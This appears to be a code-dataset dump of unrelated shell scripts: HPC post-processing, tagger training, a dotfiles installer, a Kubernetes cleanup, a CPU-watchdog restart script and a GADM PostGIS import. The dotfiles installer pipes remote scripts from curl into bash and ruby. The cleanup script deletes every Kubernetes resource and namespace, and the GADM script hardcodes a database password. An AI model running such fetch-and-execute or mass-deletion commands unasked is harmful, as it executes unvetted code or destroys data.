sbatch -J "fe.${rst}.${L}.${type}" -e "log/slurm/fe.${rst}.${L}.${type}.e%j" -o "log/slurm/fe.${rst}.${L}.${type}.o%j" -N1 -n12 --mem-per-cpu=2G -t${wallhours}:00:00 ${submitscript}
fi
done
else
export lambda1=${lambdas[0]}
export lambda2=${lambdas[1]}
export lambda3=${lambdas[2]}
export lambda4=${lambdas[3]}
export lambda5=${lambdas[4]}
export INFILE=tsm.post_processing.str
export OUTFILE=log/log.tsm.post_processing.${type}.str
#sbatch -J "pp.${type}" -e "log/slurm/pp.${type}.e%j" -o "log/slurm/pp.${type}.o%j" -N1 -n1 --mem-per-cpu=2G -t10:00:00 ${submitscript}
./${submitscript}
#create output file
echo "fixing output file"
#find first line of interest
tail -n +`grep -n "plot files" ${OUTFILE} | sed -e "s/:/ /" | awk '{print $1}' | head -n 1` ${OUTFILE} > output/postp/${drug2}_${type}_tmp.txt
#cut out lines not of interest
head -n `grep -n CHARMM output/postp/${drug2}_${type}_tmp.txt | sed -e "s/:/ /" | awk '{print $1}' | head -n 1` output/postp/${drug2}_${type}_tmp.txt | head -n -2 | tail -n +4 > output/postp/${drug2}_${type}.txt
rm output/postp/${drug2}_${type}_tmp.txt
echo "Done. Processed TSM data in output/postp/${drug2}_${type}.txt"
fi
rm $submitscript
| true |
c04f9d87334d3c0b126d86e94f89a6fc73499455 | Shell | danesjenovdan/parladata | /tagger/train.sh | UTF-8 | 1,014 | 2.625 | 3 | [] | no_license | #!/bin/bash
# prepare marisa for tagger training
echo "Preparing marisa for tagger training."
cat sloleks_clarin_2.0-en.ud.tbl | cut -f 1,2,3 | python prepare_marisa.py sl.marisa
echo "Generated the following files: sl.lemma_freq, sl.marisa"
# train the tagger
echo "Training the tagger, this will take 6-ish hours."
python train_tagger.py sl
echo "Generated the following files: sl.msd.model"
# prepare the lexicon for the lemmatizer
echo "Preparing the lexicon for the lemmatizer."
python lemma_freq.py sl.lemma_freq < sl.train
echo "Created the following files: sl.lemma_freq"
# transform the lexicon into a marisa_trie.BytesTrie
echo "Transforming the lexicon into a marise_trie.BytesTrie."
cat sloleks_clarin_2.0-en.ud.tbl | cut -f 1,2,3 | python prepare_lexicon.py sl.lemma_freq sl.lexicon
echo "Created the following files: sl.lexicon, sl.lexicon.train"
# train the lemma guesser
echo "Training lemmatiser."
python train_lemmatiser.py sl.lexicon
echo "Created the following files: sl.lexicon.guesser"
| true |
442664e77aed0483bd562da5def308bfdcf114f1 | Shell | hallyn/sxmo-scripts | /telegram-new | UTF-8 | 724 | 3.5 | 4 | [] | no_license | #!/bin/bash
# This is intended as a rtcwake hook. It checks for new telegram messages
# and will do a ring if found.
ACCOUNTS="mail Notify"
new=0
#now=$(date -d now +%s)
lastcheck=$(stat -c "%Z" ~/tg-new)
for A in $ACCOUNTS; do
telegram-cli -W -e "history $A" | awk '/^ [0-9][0-9]:[0-9][0-9]/ { print $1 }' | tr -d '[]' | while read line; do
msgtime=$(date -d $line +%s)
#if [ $msgtime -ge $now ]; then
if [ $msgtime -ge $lastcheck ]; then
new=$((new + 1))
fi
done
done
echo $new > ~/tg-new
if [ $new -gt 0 ]; then
notify-send "$new new messages"
if [ -x "$XDG_CONFIG_HOME/sxmo/hooks/ring" ]; then
$XDG_CONFIG_HOME/sxmo/hooks/ring
fi
exit 1
fi
| true |
c60d0702798e7e1b4b42d4ad06e4a1ed7cebcce2 | Shell | nicktimko/talks-throw-out-your-shell-scripts | /examples/sh-snippets/if.sh | UTF-8 | 90 | 2.828125 | 3 | [] | no_license | #!/bin/sh
argument=$1
if [ $argument -ne 0 ]
then
echo "yerp"
else
echo "nope"
fi
| true |
ba5a5697943db3321d2af7094f6442b945eeea3e | Shell | floppyzedolfin/adventofcode | /scripts/create_day.sh | UTF-8 | 570 | 3.71875 | 4 | [
"Unlicense"
] | permissive | #! /usr/bin/env bash
# This script should be called from the root of the repo.
if [ ! -f ./Makefile ]; then
exit 1
fi
if [ $# -ne 1 ]; then
echo "missing parameter day"
exit 1
fi
# cast to int
day=$(($1))
# print to the right format
day=$(printf "%02d" ${day})
mkdir 2020/dec${day}
cp -r 2020/decXX/* 2020/dec${day}/.
mv 2020/dec${day}/decXX.go 2020/dec${day}/dec${day}.go
mv 2020/dec${day}/decXX_test.go 2020/dec${day}/dec${day}_test.go
sed -i -e "s/XX/${day}/g" 2020/dec${day}/dec${day}.go
sed -i -e "s/XX/${day}/g" 2020/dec${day}/dec${day}_test.go
| true |
92fe6f77717973374f8a745f8c33432b643d08a4 | Shell | AlexiaChen/Adrasteia | /operating-system/linux/shell/bash/cpu_util.sh | UTF-8 | 1,016 | 3.25 | 3 | [] | no_license | #/bin/bash
# usage: run this command, nohup pcmant.sh &
# author: MathxH
# email: brainfvck@foxmail.com
get_cpu_usage()
{
read cpu user nice system idle iowait irq softirq steal guest< /proc/stat
# compute active and total utilizations
cpu_active_prev=$((user+system+nice+softirq+steal))
cpu_total_prev=$((user+system+nice+softirq+steal+idle+iowait))
sleep 5
# Read /proc/stat file (for second datapoint)
read cpu user nice system idle iowait irq softirq steal guest< /proc/stat
# compute active and total utilizations
cpu_active_cur=$((user+system+nice+softirq+steal))
cpu_total_cur=$((user+system+nice+softirq+steal+idle+iowait))
# compute CPU utilization (%)
cpu_util=$((100*( cpu_active_cur-cpu_active_prev ) / (cpu_total_cur-cpu_total_prev) ))
return $cpu_util
}
while [ 1 ]
do
get_cpu_usage
RESULT=$?
if [ $RESULT -ge 95 ]
then
echo "$RESULT >= 95 restarting server..."
pkill -f java
pkill -f tomcat
bash /root/tomcat7/bin/startup.sh
echo "restarting server finished"
fi
done
| true |
cd25d33fe7bc52c98e6fc50958fe5d0a2fc3d41e | Shell | sfabrizio/dotfiles | /install.sh | UTF-8 | 2,424 | 3.390625 | 3 | [] | no_license | if ! command -v git >/dev/null 2>&1; then
echo "git is required. Please install it first."
exit 1;
fi
cd ~
git clone git://github.com/sfabrizio/dotfiles.git dotfiles
#detec OS
source ~/dotfiles/scripts/get_os_name.sh
OS_NAME=`get_os_name`
function isNodeJs {
if command -v node >/dev/null 2>&1; then
return 0;
else
return 1;
fi
}
#OSX install require packages
if [[ "$OS_NAME" == 'osx' ]]; then
if ! command -v brew >/dev/null 2>&1; then
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
fi
if ! command -v byobu >/dev/null 2>&1; then
echo "installing byobu:"
brew install byobu
fi
if ! isNodeJs ; then
echo "installing node js:"
brew install node
fi
brew install neovim git-extras
fi
# install package for any OS
npm_packages=('turbo-git' 'diff-so-fancy')
if ! isNodeJs ; then
echo "install node js adn them install the require packages by running:"
echo "'npm i -g ${npm_packages[@]}'"
else
npm install -g ${npm_packages[@]}
fi
bash -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
chsh -s `which zsh`
if ! [ -d ~/.nvm ]; then
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.4/install.sh | bash
fi
echo "Intaling nodeJS version on NVM"
nvm install 7
nvm install 8
nvm install 10
echo "Creating backup of your previus config files."
cp ~/.gitconfig ~/.gitconfig.bak > /dev/null
cp ~/.vimrc ~/.vimrc.bak > /dev/null
cp ~/.zshrc ~/.zshrc.bak > /dev/null
cp ~/.tmux.conf ~/.tmux.conf.bak > /dev/null
#creating folders
cd ~/
mkdir -p dotfiles
mkdir -p workspace
mkdir -p .tmux
mkdir -p .autoenv
mkdir -p .config/nvim
#creating symbolic links
ln -s env .env
echo "cloning git repos..."
cd ~
git clone git://github.com/kennethreitz/autoenv.git .autoenv
cd ~/workspace
git clone https://github.com/sfabrizio/ozono-zsh-theme
cd ~/.tmux
git clone https://github.com/erikw/tmux-powerline.git
echo "Coping new configuration files.."
echo "[include] path = ~/dotfiles/gitconfig" > ~/.gitconfig
echo "source ~/dotfiles/vimrc" > ~/.vimrc
echo "source ~/.vimrc" > ~/.config/nvim/init.vim
echo "source ~/dotfiles/zshrc" > ~/.zshrc
echo "source ~/dotfiles/tmux.conf" > ~/.tmux.conf
echo "source ~/dotfiles/tmux-powerlinerc" > ~/.tmux-powerlinerc
source ~/.zshrc
echo "Everything Done."
| true |
cd1b7cb6307c880fe56858ec31a8718382dd2002 | Shell | asai-obsolete-code/torque-utils | /setup/cfn-sshconfig | UTF-8 | 716 | 3.53125 | 4 | [] | no_license | #!/bin/bash
dir=$(dirname $(readlink -ef $0))
. $dir/common
config=$HOME/.ssh/config
name=${1:-$name}
trap "rm -vf $config.tmp" EXIT
trap "exit 1" INT TERM HUP
while :
do
host=$($dir/cfn-hostname $name)
[ $? == 0 ] && [ ! -z $host ] && break
echo "Failed to find the public DNS" >&2
sleep 5
done
echo "DNS found: $host" >&2
# while :
# do
# ping -c 1 $host &>/dev/null && break
# echo "host is not up: $host" >&2
# sleep 5
# done
(
sed "/^# BEGIN $name-cfn/,/^# END $name-cfn/d" < $config
cat <<EOF
# BEGIN $name-cfn
Host $name
HostName $host
User $user
IdentityFile ~/Dropbox/private/publickeys/wasabi.enc
# END $name-cfn
EOF
) > $config.tmp
cat $config.tmp > $config
| true |
d4223efb5bab711a117a848c10a9b34b20ada757 | Shell | dhungvi/publiy | /publiy/misc/bash_bin/extract_strategies_delivery_pathlength_timing_summary_awk | UTF-8 | 5,018 | 2.9375 | 3 | [] | no_license | #!/bin/bash
if [ ! -d "$dir1" ]; then
red "Dir1 $dir1 is not set";
exit -1; fi
if [ ! -d "$dir2" ]; then
red "Dir2 $dir2 is not set";
exit -1; fi
if [ ! -d "$dir3" ]; then
red "Dir3 $dir3 is not set";
exit -1; fi
workingdir=`pwd`;
exec1="`echo $dir1 | awk '{printf gensub(/.*__([[:digit:]]*).*/,"\\\\1",1);}'`"
exec2="`echo $dir2 | awk '{printf gensub(/.*__([[:digit:]]*).*/,"\\\\1",1);}'`"
exec3="`echo $dir3 | awk '{printf gensub(/.*__([[:digit:]]*).*/,"\\\\1",1);}'`"
fanout1="`echo $dir1 | awk '{printf gensub(/.*FOUT([[:digit:]]*).*/,"\\\\1",1);}'`"
fanout2="`echo $dir2 | awk '{printf gensub(/.*FOUT([[:digit:]]*).*/,"\\\\1",1);}'`"
fanout3="`echo $dir3 | awk '{printf gensub(/.*FOUT([[:digit:]]*).*/,"\\\\1",1);}'`"
if [ "$fanout1" != "$fanout2" -o "$fanout2" != "$fanout3" ]; then
red "Fanout values mismatch: $fanout1, $fanout2, $fanout3";
exit -1; fi
mult1="`echo $dir1 | awk '{printf gensub(/.*MULT([[:digit:]]*).*/,"\\\\1",1);}'`"
mult2="`echo $dir2 | awk '{printf gensub(/.*MULT([[:digit:]]*).*/,"\\\\1",1);}'`"
mult3="`echo $dir3 | awk '{printf gensub(/.*MULT([[:digit:]]*).*/,"\\\\1",1);}'`"
if [ "$delta1" != "$delta2" -o "$delta2" != "$delta3" ]; then
red "Delta values mismatch: $delta1, $delta2, $delta3";
exit -1; fi
inbw1="`echo $dir1 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
inbw2="`echo $dir2 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
inbw3="`echo $dir3 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
if [ "$inbw1" != "$inbw2" -o "$inbw2" != "$inbw3" ]; then
red "Inbw values mismatch: $inbw1, $inbw2, $inbw3";
exit -1; fi
outbw1="`echo $dir1 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\2",1);}'`"
outbw2="`echo $dir2 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\2",1);}'`"
outbw3="`echo $dir3 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\2",1);}'`"
if [ "$outbw1" != "$outbw2" -o "$outbw2" != "$outbw3" ]; then
red "Outbw values mismatch: $outbw1, $outbw2, $outbw3";
exit -1; fi
delta1="`echo $dir1 | awk '{printf gensub(/.*-d([[:digit:]]*)-.*/,"\\\\1",1);}'`"
delta2="`echo $dir2 | awk '{printf gensub(/.*-d([[:digit:]]*)-.*/,"\\\\1",1);}'`"
delta3="`echo $dir3 | awk '{printf gensub(/.*-d([[:digit:]]*)-.*/,"\\\\1",1);}'`"
if [ "$delta1" != "$delta2" -o "$delta2" != "$delta3" ]; then
red "Delta values mismatch: $delta1, $delta2, $delta3";
exit -1; fi
str1="`echo $dir1 | awk '{printf gensub(/.*STR([[:digit:]]*).*/,"\\\\1",1);}'`"
str2="`echo $dir2 | awk '{printf gensub(/.*STR([[:digit:]]*).*/,"\\\\1",1);}'`"
str3="`echo $dir3 | awk '{printf gensub(/.*STR([[:digit:]]*).*/,"\\\\1",1);}'`"
if [ "$str1" != "1" ]; then
red "$dir1 is not a strategy 1 directory";
exit -1;
elif [ "$str2" != "2" ]; then
red "$dir2 is not a strategy 2 directory";
exit -1;
elif [ "$str3" != "3" ]; then
red "$dir3 is not a strategy 3 directory";
exit -1;
fi
pdelay1="`echo $dir1 | awk '{printf gensub(/.*DELAY{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
pdelay2="`echo $dir2 | awk '{printf gensub(/.*DELAY{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
pdelay3="`echo $dir3 | awk '{printf gensub(/.*DELAY{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
p2p_all=`awk '{printf $1" "}' $dir1/plots/delivery_pathlength_timings_grouped`;
summaryfilename="strategies_delivery_pathlength_timing_summary_mult"$mult1","$mult2","$mult3"_pdelay"$pdelay1","$pdelay2","$pdelay3"_delta"$delta1,$delta2,$delta3"_str"$str1","$str2","$str3"_fanout"$fanout1","$fanout2","$fanout3"_bw"$inbw1"_exec"$exec1","$exec2","$exec3;
i=0;
if [ -f "$summaryfilename" ]; then
red "SKIPPING creation of summary file $summaryfilename";
else
green "Starting awking!"
awk "BEGIN{while(1==1){if(0>getline(\"$dir1/plots/delivery_pathlength_timings_summary\"))break; str1[\"\$1\"]=\"\$0\";} while(1==1){if(0>getline(\"$dir2/plots/delivery_pathlength_timings_summary\")) break; str2[\"\$1\"]=\"\$0\";} while(1==1){if(0>getline(\"$dir3/plots/delivery_pathlength_timings_summary\"))break; str3[\"\$1\"]=\"\$0\";} l=asorti(str1,dest1); for(i=1;i<=l;i++){print str1[dest[l]]; print str2[dest[l]]; print str3[dest[l]]; print \"\"; }}" > $summaryfilename;
fi
for str in 1 2 3; do
strXsummaryfile="strategies_delivery_pathlength_timing_summary_mult"$mult1","$mult2","$mult3"_pdelay"$pdelay1","$pdelay2","$pdelay3"_delta"$delta1,$delta2,$delta3"_str"$str"_fanout"$fanout1","$fanout2","$fanout3"_bw"$inbw1"_exec"$exec1","$exec2","$exec3;
awk "{if(\$2==$str)print}" $summaryfilename > $strXsummaryfile;
green -e "Strategy $str\n`awk '{tot_delay+=$4; tot_path_len+=$5; tot_msg+=$6;}END{print "Total msg:\\t"tot_msg"\\nTotal pathlen:\\t"tot_path_len"\\nTotal delay:\t"tot_delay"\\nAvg Pathlen:\\t"(tot_path_len/tot_msg)"\\nAvg delay:\\t"(tot_delay/tot_msg); }' $strXsummaryfile`";
done
| true |
86bca1f3c86c8c0a8ce79ac906715c6abfb280a2 | Shell | ultimateboy/service-catalog | /contrib/jenkins/cluster_utilities.sh | UTF-8 | 1,816 | 3.4375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -o nounset
set -o errexit
ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
. "${ROOT}/contrib/hack/utilities.sh" || { echo 'Cannot load Bash utilities'; exit 1; }
# Cleanup services in Kubernetes to prevent network resource leaking
function wipe_cluster() {
local namespace
for namespace in $(kubectl get namespaces -oname | grep -v kube-system); do
namespace="${namespace##*/}"
kubectl delete deployments,services,configmaps,pods,replicasets \
--all --namespace "${namespace}"
wait_for_expected_output -x -e 'Terminating' -n 20 -s 2 -t 60 \
kubectl get pods --namespace "${namespace}" \
|| echo "WARNING: Some Kubernetes resources in namespace "${namespace}" failed to terminate."
if [[ "${namespace}" != "default" ]]; then
kubectl delete namespace "${namespace}"
fi
done
kubectl delete serviceinstances,serviceclasses,servicebindings,servicebrokers --all #TODO: Eventually this should work.
# Temporarily, delete all by name.
kubectl delete serviceinstances backend frontend
kubectl delete serviceclasses booksbe user-provided-service
kubectl delete servicebindings database
kubectl delete servicebrokers k8s ups
return 0
}
| true |
f806210fc590066b4820bd11be978f007923f004 | Shell | JasonSFuller/mirror | /install.sh | UTF-8 | 5,625 | 3.65625 | 4 | [
"MIT"
] | permissive | #!/bin/bash
################################################################################
function init
{
if [[ "$(id -u)" -ne 0 ]]; then
echo "ERROR: you must be root" 2>&1
exit 1
fi
local self=$(readlink -f "$0")
local selfdir=$(dirname "$self")
MIRROR_CONFIG="${selfdir}/etc/mirror.conf"
now=$(date +%Y%m%d%H%M%S)
if [[ -r "${MIRROR_CONFIG}" ]]; then
source "${MIRROR_CONFIG}"
else
echo "ERROR: could not read config (${MIRROR_CONFIG})" 2>&1
exit 1
fi
}
function install_packages
{
echo 'installing required packages'
yum -y install \
@base @core vim policycoreutils-python rsync \
httpd mod_ssl openssl \
createrepo pykickstart \
tftp-server xinetd syslinux-tftpboot memtest86+ \
tftp telnet nmap # troubleshooting
}
function config_generate_ssl_certs
{
echo 'generating self-signed certs'
key="/etc/pki/tls/private/${MIRROR_HTTPD_SERVER_NAME}.key"
cfg="/etc/pki/tls/certs/${MIRROR_HTTPD_SERVER_NAME}.cfg"
csr="/etc/pki/tls/certs/${MIRROR_HTTPD_SERVER_NAME}.csr"
crt="/etc/pki/tls/certs/${MIRROR_HTTPD_SERVER_NAME}.crt"
echo " private key = $key"
echo " csr template = $cfg"
echo " cert signing req = $csr"
echo " public cert = $crt"
if [[ ! -f "$key" ]]; then
openssl genrsa -out "$key" 4096
chmod 600 "$key"
fi
if [[ ! -f "$cfg" ]]; then
cat <<- EOF > "$cfg"
default_bits = 2048
default_md = sha256
prompt = no
distinguished_name = dn
extensions = ext
req_extensions = ext
x509_extensions = ext
[ dn ]
#C = My Country Code
#ST = My State
#L = My Location
#O = My Organization
#OU = My Organizational Unit
#emailAddress = My Email Address
CN = ${MIRROR_HTTPD_SERVER_NAME}
[ ext ]
subjectAltName = @san
[ san ]
DNS.0 = ${MIRROR_HTTPD_SERVER_NAME}
EOF
# Add the alternate DNS hostnames to the template.
for ((i=0; i<${#MIRROR_HTTPD_SERVER_ALIAS[*]}; i++))
do
echo "DNS.$((i+1)) = ${MIRROR_HTTPD_SERVER_ALIAS[i]}" >> "$cfg"
done
fi
if [[ -f "$csr" ]]; then
echo "Found existing CSR; creating backup '${csr}.${now}.backup' and generating a new one."
mv "$csr" "${csr}.${now}.backup"
fi
openssl req -new -config "$cfg" -key "$key" -out "$csr"
if [[ ! -f "$crt" ]]; then
openssl req -x509 -days 3650 -key "$key" -in "$csr" -out "$crt"
fi
}
function config_web_server
{
echo 'configuring the web server'
firewall-offline-cmd --add-service=http
firewall-offline-cmd --add-service=https
> /etc/httpd/conf.d/welcome.conf
rm -f /etc/httpd/conf.d/autoindex.conf
ln -s "${MIRROR_BASE_PATH}/etc/httpd/autoindex.conf" /etc/httpd/conf.d/
ln -s "${MIRROR_BASE_PATH}/etc/httpd/mirror-www.conf" /etc/httpd/conf.d/
for i in "${MIRROR_HTTPD_SERVER_ALIAS[@]}"
do
printf -v line ' %-26s "%s"\n' "ServerAlias" "$i"
export MIRROR_HTTPD_SERVER_ALIAS_GENERATED+="$line"
done
envsubst \
< "${MIRROR_BASE_PATH}/etc/httpd/mirror-www.conf.template" \
> "${MIRROR_BASE_PATH}/etc/httpd/mirror-www.conf"
}
function config_tftp_server
{
echo "configuring the tftp server"
firewall-offline-cmd --add-service=tftp
cp -a /etc/xinetd.d/tftp{,.${now}.backup}
sed -i -r 's/^(\s*disable\s*=).*/\1 no/' /etc/xinetd.d/tftp
sed -i -r "s#^(\\s*server_args\\s*=).*#\\1 -v -s ${MIRROR_BASE_PATH}/tftp#" /etc/xinetd.d/tftp
# BUG
# These files are COPIED from the syslinux and memtest86+ package dirs
# because of an issue with in.tftpd accessing files (symlinks) outside
# the served directory. Plus, we don't really want binaries in source
# control. Bottom-line, this means if the syslinux package is updated,
# these binaries need to be copied again. [*sigh*] It's a good thing
# it changes infrequently.
install -o root -g root -m 644 /var/lib/tftpboot/pxelinux.0 "${MIRROR_BASE_PATH}/tftp/"
install -o root -g root -m 644 /var/lib/tftpboot/chain.c32 "${MIRROR_BASE_PATH}/tftp/"
install -o root -g root -m 644 /var/lib/tftpboot/menu.c32 "${MIRROR_BASE_PATH}/tftp/"
install -o root -g root -m 644 /boot/memtest86+-5.01 "${MIRROR_BASE_PATH}/tftp/images/"
}
function config_selinux_paths
{
echo 'configuring selinux paths'
semanage fcontext -a -t httpd_config_t "${MIRROR_BASE_PATH}/etc/httpd(/.*)?"
semanage fcontext -a -t httpd_sys_content_t "${MIRROR_BASE_PATH}/www(/.*)?"
semanage fcontext -a -t httpd_sys_content_t "${MIRROR_BASE_PATH}/theme(/.*)?"
semanage fcontext -a -t tftpdir_t "${MIRROR_BASE_PATH}/tftp(/.*)?"
# TODO maybe? allow the auto gen; not happy with autogen RN
# semanage fcontext -a -t httpd_sys_script_exec_t "${MIRROR_BASE_PATH}/www/ks/auto"
restorecon -R -v "${MIRROR_BASE_PATH}"
}
function install_update_cronjob
{
echo 'installing mirror cronjob'
ln -s "${MIRROR_BASE_PATH}/etc/cron.d/mirror" /etc/cron.d/mirror
}
function install_logrotate_config
{
echo 'installing mirror logrotate config'
ln -s "${MIRROR_BASE_PATH}/etc/logrotate.d/mirror" /etc/logrotate.d/mirror
}
################################################################################
init
install_packages
config_generate_ssl_certs
config_web_server
config_tftp_server
config_selinux_paths
systemctl enable httpd
systemctl restart httpd
systemctl enable xinetd # tftp
systemctl restart xinetd # tftp
systemctl enable firewalld
systemctl restart firewalld
install_update_cronjob
install_logrotate_config
| true |
97f5d98c74c0d4099a5fbe2a238e6ac09fdf6c0c | Shell | Hiwensen/kotlin-web-site-cn | /pages-includes/docs/tutorials/native/generate-includes.sh | UTF-8 | 4,434 | 3.5 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -e -x -u
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
ROOT="$( cd "${DIR}" && cd "../../../.." && pwd)"
echo "Root directory is $ROOT"
EXTERNAL="$ROOT/external"
SAMPLES_REPO="$EXTERNAL/kotlin-web-site-samples"
if [[ ! -d "$EXTERNAL" ]] ; then
mkdir "$EXTERNAL"
fi
if [[ ! -d "$SAMPLES_REPO" ]] ; then
git clone https://github.com/kotlin/web-site-samples.git "$SAMPLES_REPO"
else
git "--git-dir=$SAMPLES_REPO/.git" fetch
fi
function generate_code_block {
code_target="$DIR/$1-code.md"
link_target="$DIR/$1-link.md"
branch="$2"
remoteBranch="origin/$branch"
lang=$3
os=$4
fileInBranch=$5
zipUrl=https://github.com/kotlin/web-site-samples/archive/$branch.zip
code="$(git "--git-dir=$SAMPLES_REPO/.git" show $remoteBranch:$fileInBranch)"
code="$(echo "$code" | sed '/./,$!d' | sed -e :a -e '/^\n*$/{$d;N;};/\n$/ba')"
echo "" >> $code_target
echo "<div class=\"multi-language-sample\" data-lang=\"$lang\" data-os=\"$os\">" >> $code_target
echo "<div class=\"sample\" markdown=\"1\" theme=\"idea\" mode=\"$lang\" data-highlight-only>" >> $code_target
echo "" >> $code_target
echo '```' >> $code_target
echo "$code" >> $code_target
echo '```' >> $code_target
echo "" >> $code_target
echo "</div>" >> $code_target
echo "</div>" >> $code_target
echo "" >> $code_target
echo "<span class=\"multi-language-span\" data-lang=\"$lang\" data-os=\"$os\">" >> $link_target
echo "[GitHub]($zipUrl)." >> $link_target
echo "</span>" >> $link_target
}
rm -f $DIR/*-code.md
rm -f $DIR/*-link.md
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-groovy-macos groovy macos build.gradle
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-groovy-linux groovy linux build.gradle
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-groovy-windows groovy windows build.gradle
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-kotlin-macos kotlin macos build.gradle.kts
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-kotlin-linux kotlin linux build.gradle.kts
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-kotlin-windows kotlin windows build.gradle.kts
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-groovy-macos-c groovy macos build.gradle
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-groovy-linux-c groovy linux build.gradle
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-groovy-windows-c groovy windows build.gradle
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-kotlin-macos-c kotlin macos build.gradle.kts
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-kotlin-linux-c kotlin linux build.gradle.kts
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-kotlin-windows-c kotlin windows build.gradle.kts
generate_code_block "dynamic-library" mpp-kn-shared-lib-groovy-linux groovy linux build.gradle
generate_code_block "dynamic-library" mpp-kn-shared-lib-groovy-macos groovy macos build.gradle
generate_code_block "dynamic-library" mpp-kn-shared-lib-groovy-windows groovy windows build.gradle
generate_code_block "dynamic-library" mpp-kn-shared-lib-kotlin-linux kotlin linux build.gradle.kts
generate_code_block "dynamic-library" mpp-kn-shared-lib-kotlin-macos kotlin macos build.gradle.kts
generate_code_block "dynamic-library" mpp-kn-shared-lib-kotlin-windows kotlin windows build.gradle.kts
generate_code_block "apple-framework" mpp-kn-framework-groovy-macos-mac groovy macos build.gradle
generate_code_block "apple-framework" mpp-kn-framework-kotlin-macos-mac kotlin macos build.gradle.kts
| true |
5a215bcff1d00896ee837332b72b526f2976fce7 | Shell | GayanSandaruwan/scripts | /char_case_counter/file_size-awk.sh | UTF-8 | 1,718 | 4.3125 | 4 | [] | no_license | #!/bin/bash
###################################################################
#Script Name : file_size-awk.sh
#Description : File size calculator in directory using awk
#Args : source directory which need count the file sizes
#Author : Replace with your name
#Email : replace with your email
###################################################################
directory=${1}
# The command line help #
display_help() {
echo "Usage: $0 text_file" >&2
# echo
# echo " --help display help"
# echo " directory_name source directory which need count the file sizes "
# echo
# echo " eg: $0 fruits"
# echo
}
if [[ -z "$directory" ]] #Check availability of input params
then
# echo "Too few input params"
display_help
exit 1
fi
if [[ ! -z "${2}" ]] #Check availability of input params
then
# echo "ERROR: Too many number of input params"
display_help
exit 1
fi
if [ "$1" == "--help" ]; then #check if requesting for help
display_help
exit 0
fi
if [ ! -d "$directory" ]; then
# Control will enter here if $sourcefile doesn't exist.
echo "Error: cannot open $directory"
display_help
exit 1
fi
file_size_tot () {
ls -FaGl "$directory" | awk '{ total += $4;}; END { print total }';
}
file_size_tot
| true |
dba5d3013042c7fb3fc1cb2defd2c022439b5c74 | Shell | MiloMonnier/gadm_postgis | /build_GADM_database.sh | UTF-8 | 3,075 | 2.875 | 3 | [] | no_license | # Get the latest download link on https://gadm.org/download_world.html
wget -nc https://biogeo.ucdavis.edu/data/gadm3.6/gadm36_gpkg.zip
unzip gadm36_gpkg.zip
host='localhost'
port='5432'
db='gadm'
user='milo'
psswd='postgres'
# Create a new database "gadm"
psql -U ${user} -d postgres -c "CREATE DATABASE ${db};"
psql -U ${user} -d ${db} -c "CREATE EXTENSION IF NOT EXISTS postgis;"
# Import the geopackage file into the database
PGIDS="dbname=${db} host=${host} port=${port} user=${user} password=${psswd}"
ogr2ogr -f PostgreSQL PG:"${PGIDS}" gadm36.gpkg
# Create a test database (here, Senegal and Guinea) and check it with QGIS for example
psql -U ${user} -d ${db} -c "
DROP TABLE IF EXISTS gadmtest;
CREATE TABLE gadmtest AS
SELECT * FROM gadm
WHERE gid_0 IN ('SEN','GIN');
"
# Create 5 different tables at 5 administrative levels of aggregation
# 0 - country scale
psql -U ${user} -d ${db} -c "
DROP TABLE IF EXISTS gadm_0;
CREATE TABLE gadm_0 AS
SELECT
gid_0, name_0,
ST_Union(wkb_geometry) AS geom
FROM gadm
GROUP BY
gid_0, name_0;
"
# 1st administrative level (regions, in most of cases)
psql -U ${user} -d ${db} -c "
DROP TABLE IF EXISTS gadm_1;
CREATE TABLE gadm_1 AS
SELECT
gid_0, name_0,
gid_1, name_1, engtype_1,
ST_Union(wkb_geometry) AS geom
FROM gadm
GROUP BY
gid_0, name_0,
gid_1, name_1, engtype_1;
"
# 2nd administrative level
psql -U ${user} -d ${db} -c "
DROP TABLE IF EXISTS gadm_2;
CREATE TABLE gadm_2 AS
SELECT
gid_0, name_0,
gid_1, name_1, engtype_1,
gid_2, name_2, engtype_2,
ST_Union(wkb_geometry) AS geom
FROM gadm
GROUP BY
